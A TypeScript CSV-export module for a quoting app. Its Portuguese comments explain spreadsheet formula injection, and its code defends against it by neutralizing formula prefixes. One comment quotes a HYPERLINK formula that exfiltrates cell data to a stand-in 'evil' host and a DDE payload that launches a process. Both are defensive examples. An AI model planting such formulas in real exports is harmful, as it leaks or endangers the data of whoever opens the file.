import { Capacitor } from '@capacitor/core';
import { Filesystem, Directory } from '@capacitor/filesystem';
import { FileOpener } from '@capacitor-community/file-opener';

interface ExportableData {
  [key: string]: string | number | boolean | null | undefined;
}

const CSV_MIME = 'text/csv';

/**
 * Caracteres que fazem Excel / LibreOffice / Google Sheets tratarem a célula
 * como FÓRMULA em vez de texto.
 */
const FORMULA_PREFIXES = ['=', '+', '-', '@', '\t', '\r'];

/** Um número escrito em pt-BR ("-1.234,56") ou com ponto decimal ("-50.5"). */
const NUMERO_LEGITIMO = /^-?(\d{1,3}(\.\d{3})+|\d+)([.,]\d+)?$/;

/**
 * Neutraliza injeção de fórmula em planilha (CWE-1236).
 *
 * O ATAQUE: o conteúdo não é executado dentro do Orçamigo, e sim na planilha de
 * QUEM ABRE o arquivo. Um nome de cliente gravado como
 * `=HYPERLINK("http://evil/?x="&A1,"Nota")` vira um link que exfiltra dados
 * quando o contador do prestador abre o relatório; a variante DDE
 * (`=cmd|'/c calc'!A1`) chega a executar processo.
 *
 * POR QUE É ALCANÇÁVEL AQUI (não é teórico): `clients.name` entra pela
 * IMPORTAÇÃO DA AGENDA do celular — texto que o prestador nunca digitou nem
 * revisou — e, em contas de equipe, um `member` cria cliente/produto e o `owner`
 * exporta. A vítima é o usuário, não o servidor, então nenhuma política de RLS
 * pega isso: a defesa tem que estar em quem PRODUZ o arquivo.
 *
 * ASPAR NÃO BASTA, e essa é a parte não óbvia: o Excel desfaz a aspagem do CSV
 * ANTES de decidir se a célula é fórmula. `"=1+1"` continua sendo avaliado. A
 * neutralização real é o apóstrofo inicial, que marca a célula como texto.
 *
 * A EXCEÇÃO IMPORTANTE: um valor negativo legítimo ("-50,00" na coluna Valor)
 * também começa com `-`. Prefixar esses corromperia número de verdade em texto,
 * e a planilha do usuário pararia de somar a coluna. Por isso só é neutralizado
 * o que começa com um prefixo de fórmula E não é um número.
 */
export function neutralizeSpreadsheetFormula(text: string): string {
  if (!text) return text;
  if (!FORMULA_PREFIXES.includes(text[0])) return text;
  if (NUMERO_LEGITIMO.test(text)) return text;
  return `'${text}`;
}

export async function exportToCSV(
  data: ExportableData[],
  filename: string = 'export.csv',
): Promise<void> {
  if (data.length === 0) {
    throw new Error('No data to export');
  }

  // Get headers from first row
  const headers = Object.keys(data[0]);
  
  // Create CSV content
  const csvRows: string[] = [];
  
  // Add header row
  csvRows.push(headers.join(';'));
  
  // Add data rows
  for (const row of data) {
    const values = headers.map(header => {
      const value = row[header];
      
      // Handle different types
      if (value === null || value === undefined) {
        return '';
      }
      
      if (typeof value === 'string') {
        // 1. Neutraliza fórmula ANTES de aspar (o Excel desaspa antes de avaliar).
        const safe = neutralizeSpreadsheetFormula(value);
        // 2. Escapa aspas e aspa quando houver separador, aspas ou QUEBRA DE
        //    LINHA — incluindo `\r` sozinho, que a versão anterior não cobria e
        //    que leitores tratam como fim de linha (gerava uma linha a mais).
        const escaped = safe.replace(/"/g, '""');
        return /[;"\n\r]/.test(escaped) ? `"${escaped}"` : escaped;
      }
      
      return String(value);
    });
    
    csvRows.push(values.join(';'));
  }
  
  // Create blob and download
  const csvContent = '\uFEFF' + csvRows.join('\n'); // BOM for Excel UTF-8

  if (Capacitor.isNativePlatform()) {
    const finalName = filename.endsWith('.csv') ? filename : `${filename}.csv`;
    const bytes = new TextEncoder().encode(csvContent);
    let binary = '';
    const chunk = 0x8000;
    for (let i = 0; i < bytes.length; i += chunk) {
      binary += String.fromCharCode(...bytes.subarray(i, i + chunk));
    }
    const result = await Filesystem.writeFile({
      path: finalName,
      data: btoa(binary),
      directory: Directory.Documents,
    });
    try {
      await FileOpener.open({
        filePath: result.uri,
        contentType: CSV_MIME,
      });
    } catch {
      alert(`CSV salvo em Documentos/${finalName}`);
    }
    return;
  }

  const blob = new Blob([csvContent], { type: 'text/csv;charset=utf-8;' });
  const url = URL.createObjectURL(blob);
  
  const link = document.createElement('a');
  link.href = url;
  link.download = filename;
  document.body.appendChild(link);
  link.click();
  document.body.removeChild(link);
  URL.revokeObjectURL(url);
}

export function formatReportData(quotes: Array<{
  id: string;
  title?: string;
  client_name?: string;
  status: string;
  total: number;
  created_at: string;
}>) {
  const statusLabels: Record<string, string> = {
    pending: 'Pendente',
    approved: 'Aprovado',
    rejected: 'Rejeitado',
    completed: 'Concluído',
    cancelled: 'Cancelado',
  };

  return quotes.map(q => ({
    'Título': q.title || 'Sem título',
    'Cliente': q.client_name || 'Sem cliente',
    'Status': statusLabels[q.status] || q.status,
    // O tipo declara `total: number`, mas as linhas chegam do cache/PostgREST
    // como `any` — um único documento com total nulo fazia `q.total.toFixed`
    // estourar e o usuário perdia o relatório INTEIRO, com uma mensagem que não
    // dizia qual linha causou. Uma linha ruim não pode derrubar a exportação.
    'Valor': formatarValor(q.total),
    'Data': formatarData(q.created_at),
  }));
}

/** Valor em pt-BR; entrada inválida vira "0,00" em vez de derrubar tudo. */
function formatarValor(total: unknown): string {
  const n = Number(total);
  return (Number.isFinite(n) ? n : 0).toFixed(2).replace('.', ',');
}

/**
 * Data em pt-BR; entrada inválida vira string vazia.
 *
 * `new Date('nao-e-data').toLocaleDateString('pt-BR')` devolve "Invalid Date" —
 * texto que ia direto para a planilha do usuário como se fosse um dado.
 */
function formatarData(raw: unknown): string {
  if (!raw) return '';
  const d = new Date(String(raw));
  return Number.isNaN(d.getTime()) ? '' : d.toLocaleDateString('pt-BR');
}
